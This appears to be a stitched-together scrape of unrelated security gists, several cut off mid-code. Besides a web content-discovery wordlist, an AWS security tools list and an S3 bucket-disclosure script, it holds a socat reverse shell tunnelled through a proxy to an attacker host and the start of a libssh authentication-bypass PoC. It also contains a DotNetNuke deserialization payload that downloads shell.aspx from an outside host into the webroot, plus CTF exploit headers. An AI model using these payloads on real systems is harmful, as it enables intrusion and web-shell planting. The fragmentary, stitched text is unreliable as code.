@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
`
~/
~
ים
___
__
_
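The description notes this wordlist is most commonly fed to gobuster; a minimal, assumed invocation (target URL and output path are placeholders, not from the gist) would be:
gobuster dir -u https://target.example -w content_discovery_all.txt -o gobuster-results.txt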
# Pull .js links from a page ($1), run LinkFinder on each, keep output matching $2 and drop lines matching $3
curl -s "$1" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep "\.js" > jslinks.txt; while IFS= read -r link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep "$2" | grep -v "$3" | sort -n | uniq; rm -f jslinks.txt
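If the one-liner is saved as a script (the name getjslinks.sh is assumed here, not from the gist), it takes a target URL, a keyword to keep, and a keyword to exclude:
bash getjslinks.sh https://target.example api node_modules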
@markofu
markofu / Security_Tools_for_AWS.MD
Last active October 2, 2023 15:30
Security Tools for AWS

Security Tools for AWS

I often get asked which tools are good to use for securing your AWS infrastructure, so I figured I'd write a short list of some useful Security Tools for the AWS Cloud Infrastructure.

This list is not intended to be completely exhaustive; rather, it should give someone a good launching pad as they dig into AWS and want to make it secure from the start.

Open Source

This section focuses on tools and services provided by the community and released as open-source.

@fransr
fransr / bucket-disclose.sh
Last active February 16, 2025 14:38
Using error messages to decloak an S3 bucket. Uses SOAP, unicode, POST, multipart, streaming, and index listing as ways of figuring it out. You do need a valid AWS key (never the secret) to properly get the error messages.
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
# you need a valid key, since the errors only happen after AWS validates that the key exists. We do not need the secret key, only the access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
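The preview stops after the header setup; as a rough sketch of the underlying idea (assumed, not taken from the script), presenting a real access key with a deliberately bogus SigV4 signature makes S3 return a detailed XML error, such as an AuthorizationHeaderMalformed response naming the bucket's actual region, instead of a generic denial. BUCKET, the date, and the region below are placeholders:
curl -s "https://s3.amazonaws.com/BUCKET" \
  -H "x-amz-date: 20180101T000000Z" \
  -H "x-amz-content-sha256: UNSIGNED-PAYLOAD" \
  -H "Authorization: AWS4-HMAC-SHA256 Credential=AKIA.../20180101/us-east-1/s3/aws4_request, SignedHeaders=host;x-amz-date, Signature=0"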
@topolik
topolik / json-deserialization-ldap.sh
Created August 17, 2018 20:49
Backend script based on @pwntester's JSON deserialization research
#!/bin/bash
echo "Starting Apache DS using docker @ ldap://localhost:10389"
docker run --name json-deser-ldap -d -p 10389:10389 greggigon/apacheds
echo "... waiting 20 seconds to start Apache DS"
sleep 20
# password: secret, if used with LDAP login
(cat <<"EOF"
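The snippet cuts off at the start of the heredoc carrying the LDAP payload; as an assumed sanity check (not part of the gist) that the ApacheDS container is reachable, one could bind with ApacheDS's default admin account (the base DN below is a placeholder):
ldapsearch -x -H ldap://localhost:10389 -D "uid=admin,ou=system" -w secret -b "dc=example,dc=com" "(objectClass=*)"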
# On the attacking host: listen on x.x.x.x:443 with a raw local tty
socat file:`tty`,raw,echo=0 tcp-listen:443
# On the compromised host: reach the listener through the HTTP proxy at 10.10.10.1:8222, expose it as a local unix socket, then attach an interactive bash to that socket
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# Untested PoC for CVE-2018-10933 (libssh server-side authentication bypass)
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us
@hub2
hub2 / exploit.py
Created January 4, 2019 18:57
Flaglab Real World CTF
#!/usr/bin/env python3
import requests
import sys
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import random
import logging
import time